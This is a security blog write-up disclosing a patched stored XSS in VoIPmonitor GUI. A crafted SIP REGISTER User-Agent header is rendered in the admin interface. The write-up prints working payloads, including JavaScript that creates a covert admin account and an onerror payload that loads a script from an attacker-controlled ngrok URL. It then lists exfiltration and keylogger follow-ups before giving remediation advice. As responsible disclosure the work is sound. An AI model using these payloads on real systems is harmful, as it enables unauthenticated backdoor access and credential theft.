Skip to main content

Abusing SIP for Cross-Site Scripting? Most definitely!

Last updated on Jun 10, 2021 in , ,

Executive summary (TL;DR)

SIP can be used as an attack vector for AppSec vulnerabilities such as cross-site scripting (XSS), potentially leading to unauthenticated remote compromise of critical systems. VoIPmonitor GUI had one such vulnerability which highlights this attack vector exceptionally well. The following writeup explores how persistent backdoor administrative access can be obtained by sending malicious SIP messages. This vulnerability was reported by Enable Security and fixed in VoIPmonitor GUI back in February 2021, using standard cross-site scripting protection mechanisms.


Cross-site scripting (XSS) is an established and well understood application security vulnerability. Even so, the nature of the vulnerability makes it difficult to mitigate at times, often resulting in either partial remediation (i.e. still vulnerable to other payloads) or outright vulnerable inputs. When the team at Enable Security performs an offensive security audit against a cloud based provider for the very first time, one of the initial tests involves looking for cross-site scripting vulnerabilities. Even if the focus of such an audit is the voice over IP applications or infrastructure!

Before diving into the technical underpinnings of this exploit, let us start with a common customer use-case first. A customer may want to be privy to the end-user SIP device types (i.e. mobile, desktop) that are connecting to their application or server. A vendor may provide that information by rendering SIP network traffic within the application’s web interface - traffic that should actually be considered as user input. Pair these two factors together and we potentially have the ability to send unauthenticated traffic to a server with a malicious payload. This, in turn, gets rendered as HTML in the UI thus running arbitrary code within the user’s browser, which leads to XSS.

The attack

Let us shift focus towards VoIPmonitor GUI — a commercial frontend to VoIPmonitor, the open source network packet sniffer (SIP, RTP, RTCP, SKINNY(SCCP), MGCP, WebRTC). Part of the UI allows us to monitor any SIP REGISTER requests, including those that failed and with that, includes the type of user device that sent the SIP REGISTER message via the User-Agent header value (🤔).

VoIPmonitor GUI SIP REGISTER view showing user-agent strings

VoIPmonitor GUI SIP REGISTER view showing user-agent strings

Let’s play around with the SIP REGISTER message and see if we can get the UI to run some arbitrary JavaScript. Our malicious message will set the User-Agent to <img src=x onerror=alert(1)> and if this gets rendered in the DOM, the browser will fail to fetch an image under /x (which hopefully does not exist) and on failure, executes the malicious code. Here is what the message will look like.

REGISTER sip: SIP/2.0\r\n
Via: SIP/2.0/UDP;rport;branch=z9hG4bK-X\r\n
Max-Forwards: 70\r\n
From: <sip:002@>;tag=ZB1fPjdIHA6RmaNw\r\n
To: <sip:002@>\r\n
Call-ID: C15AfnWADaCSBH4O\r\n
CSeq: 1 REGISTER\r\n
Contact: <sip:002@;transport=udp>\r\n
User-Agent: <img src=x onerror=alert(1)>\r\n
Content-Type: text/plain\r\n
Content-Length: 0\r\n\r\n

Notice the value we are setting for the User-Agent header. Tweaking an opensource sip attack script, we are able to send a couple malicious packets to a test environment to see if the payload executes as expected.

Alert JavaScript function called via XSS in VoIPmonitor GUI

Alert JavaScript function called via XSS in VoIPmonitor GUI

Et voilà! We have ourselves an entry point. At face value this might not seem like much, and in the real world I’d use something less obvious, relying on some canary token or callback. However, keep in mind that this code is executed in an administrator’s browser and is stored there for a period of time (hint: temporary implicit elevation of privileges). This is where the creativity and fun starts; having ourselves an attack vector that executes arbitrary code as an administrator means we can expand the impact of this vulnerability.

As a starting point, let’s turn our temporary implicit elevation of privileges to a permanent and explicit one by creating a covert administrative user. First, let’s see what HTTP request is sent when we create an user.

HTTP request used by VoIPmonitor GUI to create users shown in devtools

HTTP request used by VoIPmonitor GUI to create users shown in devtools

A call is made to sql.php (which in itself is interesting for other reasons) with an elaborate JSON payload. We can recreate this POST (HTTP) request with the following JavaScript snippet.

var username='h3x0r';
var password='h3x0r-l33t-passwd';

$.post('php/model/sql.php', {
    task: 'CREATE',
    module: 'user_admin',
    taskParams: JSON.stringify({
        "keyField": "id",
        "data": {
          "username": username,
          "name": username,
          "password": password,
          "delete2fa_sec": 0,
          "missing_sec": "not defined",
          "req_2fa": false,
          "email": "",
          "is_admin": true,
    username: username ,
    name: username ,
    password: password ,
    delete2fa_sec: '0' ,
    email: '' ,
    is_admin: 'on' ,
    can_audit: '0' ,
    note: '' ,
    blocked_reason: '' ,
    max_bad_login_attempt: '' ,
    password_expiration_days: '' ,
    enable_login_ip: '' ,
    ip: '' ,
    number: '' ,
    domain: '' ,
    vlan: ''}

We need to tweak our payload to now run this arbitrary JavaScript in the administrator’s browser which when fired, will create our covert admin user. We can achieve this by saving our payload in a file (i.e. x.js), exposing it locally through a simple HTTP server (python -m http.server 8080) and quickly and conveniently exposing it to the internet via ngrok (ngrok http 8080). This is a quick and neat way to expose local files over the internet over HTTPS and can be used for various other techniques. The last piece of the puzzle is to now adjust the User-Agent header in our SIP REGISTER request to fetch and execute our remote JavaScript file instead of popping up an alert.

REGISTER sip: SIP/2.0\r\n
Via: SIP/2.0/UDP;rport;branch=z9hG4bK-X\r\n
Max-Forwards: 70\r\n
From: <sip:002@>;tag=ZB1fPjdIHA6RmaNw\r\n
To: <sip:002@>\r\n
Call-ID: C15AfnWADaCSBH4O\r\n
CSeq: 1 REGISTER\r\n
Contact: <sip:002@;transport=udp>\r\n
User-Agent: <img src=x onerror="var d=document,s=d.createElement`script`;s.src='$MY_NGROK_URL/x.js',d.querySelector`p`.appendChild(s)">\r\n
Content-Type: text/plain\r\n
Content-Length: 0\r\n\r\n

Now on execution, the browser will attempt to fetch an image under /x which will fail and subsequently create a <script> tag pointing to our malicious file to be executed. In the browser we should see three requests in order.

  1. Request to /x which returns a 404 (browser treats 4XX and 5XX responses as errors);
  2. Which triggers the onerror event handler to create a <script> tag to fetch our remote script (i.e. https://$some_ngrok_url/x.js);
  3. Finally sending a POST request to sql.php to create our h3x0r admin user.
Stored XSS loading malicious JavaScript in VoIPmonitor GUI

Stored XSS loading malicious JavaScript in VoIPmonitor GUI

Looks like the requests are executed in order; if we head over to our Users tab, we see our malicious admin!

Backdoor administrator created using XSS in VoIPmonitor GUI

Backdoor administrator created using XSS in VoIPmonitor GUI

Feeling like hackerman

Yes, I know the GIF is overused. More importantly, this means we now turned out temporary privilege escalation to permanent administrator access (all through a single unauthenticated SIP message). There are a couple of additional things we can do from here. We won’t go into detail but they will help illustrate the destructive impact this can have.

  • We can exfiltrate sensitive traffic passing through legitimate VoIP clients. This is particularly useful in real world scenarios where VoIPmonitor GUI would be running internally, allowing us to exfiltrate data through an Out-of-band DNS server (one of many methods);
  • Similar to how we created an admin user, we can also delete other legitimate administrators from accessing the interface;
  • We can embed keyloggers as a backdoor on the login screen, harvesting admin credentials;
  • We can include a fully fledged framework such as BeEF which may be especially useful for exploiting internal web applications.

Possible attack vectors are not limited to the above; any action that the application allows can be exploited using this technique. For example, if the application allows us to send crafted packets to a particular client or invoke some system scripts (perhaps upload arbitrary ones too), then those are all areas that can be exploited to gain persistent privileges or expand our scope through lateral movement.


VoIPmonitor GUI has since released security patches that fix these vulnerabilities and we highly recommend upgrading to the latest version as soon as possible. This issue was reported to the VoIPmonitor developers by the team at Enable Security on the 10th of February 2021 and by the 22nd an updated version could be tested. We confirmed that the code change did address the issue and the release was published on the same date.

If you are an application developer or vendor, then keep in mind that methods to remediate such attacks tend to be case-specific. However, there are a couple of key pointers that can help guide you when evaluating your application’s security posture.

Ensure that user inputs are HTML encoded prior to being rendered in some parts of the web interface.

Note — you can generally encode inputs going in (i.e. prior to be stored) or going out (i.e. prior to be rendered), where the latter is often preferred. One important recommendation is that you stick to a single encoding strategy across your application (and even organisation) to avoid double-encode or double-decode scenarios that either break your interface or make you vulnerable to cross-site scripting again.

If the user input has an expected format, structure and set of accepted values, be sure to validate those first and reject invalid inputs as early as possible.

There is one particular variant that is entirely client-side, referred to as DOM-XSS, where both the input source (e.g. document.cookie) and execution sink (e.g. eval()) are client-side. For such variants, the escaping and encoding needs to occur at client-side level rather than server-side.

There is ample material on how to mitigate cross-site scripting and the trusty OWASP Cross-site Script Prevention Cheat Sheet is an exceptional reference guide to follow for more detailed and well laid out rules to prevent cross-site scripting.